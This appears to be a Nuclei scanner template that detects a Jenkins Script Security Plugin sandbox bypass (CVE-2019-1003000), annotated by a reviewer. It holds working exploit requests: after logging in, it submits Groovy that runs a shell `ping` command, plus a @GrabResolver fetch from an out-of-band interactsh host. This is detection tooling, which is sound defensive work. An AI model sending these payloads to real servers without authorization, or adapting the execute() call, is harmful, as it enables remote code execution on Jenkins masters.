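# Nuclei template for CVE-2019-1003000 (Jenkins Script Security Plugin <= 1.49 sandbox bypass).
# Detection is out-of-band: a vulnerable instance contacts the interactsh URL while
# validating a submitted sandboxed script. Valid Jenkins credentials are required
# (hence the `authenticated` tag). The Jenkins advisory SECURITY-1266 referenced
# below is the authoritative source for affected and fixed versions.
id: CVE-2019-1003000

info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-1003000
    # NOTE(review): the wildcard fields of this CPE string look as if they were
    # stripped by the page renderer (empty `::::::` fields) — verify against the
    # upstream template before relying on it for matching.
    cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
  reference:
    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  metadata:
    verified: true
    # http(1) sends 1 request, http(2) 2, http(3) 2, http(4) 1.
    max-request: 6
    vendor: jenkins
    product: script_security
  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated

variables:
  username: admin
  # NOTE(review): `{{password}}` is used by the login request below but is not
  # declared here — presumably supplied at run time; confirm with the caller.
  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
  app_name: "{{rand_text_alpha(8)}}"

# Only continue past fingerprinting when the login succeeded; the two sandbox
# checks (3 and 4) are alternatives, either one confirms the finding.
flow: http(1) && http(2) && (http(3) || http(4))

http:
  # Stage 1: fingerprint — the login page must identify itself as Jenkins.
  # `internal: true` means this match alone never produces a finding.
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "jenkins"
        internal: true
        case-insensitive: true

  # Stage 2: authenticate, then confirm the session by checking that the landing
  # page (body_2 = response to the second request) offers a logout link.
  - raw:
      - |
        POST /j_acegi_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
        internal: true

  # Stage 3: submit a sandboxed script to the checkScript validator. The two
  # requests differ only in the ping flag (-c for Unix, -n for Windows); a DNS
  # interaction with the interactsh host is the indicator, so stop at the first hit.
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

  # Stage 4: alternative check via checkScriptCompile with a @Grab resolver
  # pointing at the interactsh host. Both conditions must hold: an HTTP
  # interaction, and a request for the expected artifact .pom path (the random
  # vendor/app names keep the path unique to this scan).
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"

# NOTE(review): the digest below presumably signs the template content; any edit
# to the file (comments included) invalidates it, so re-sign before distributing.
# digest: 4b0a0048304602210085a1faf7a3de1a102f1ab5fde71db42124776cb68e66f315bdaa1a141107750b0221008549adaf38ad9247d2a2c9a8ea35e4672abe0f3ebe12c70656f9d4b465180de8:922c64590222798bb761d5b6d8e72950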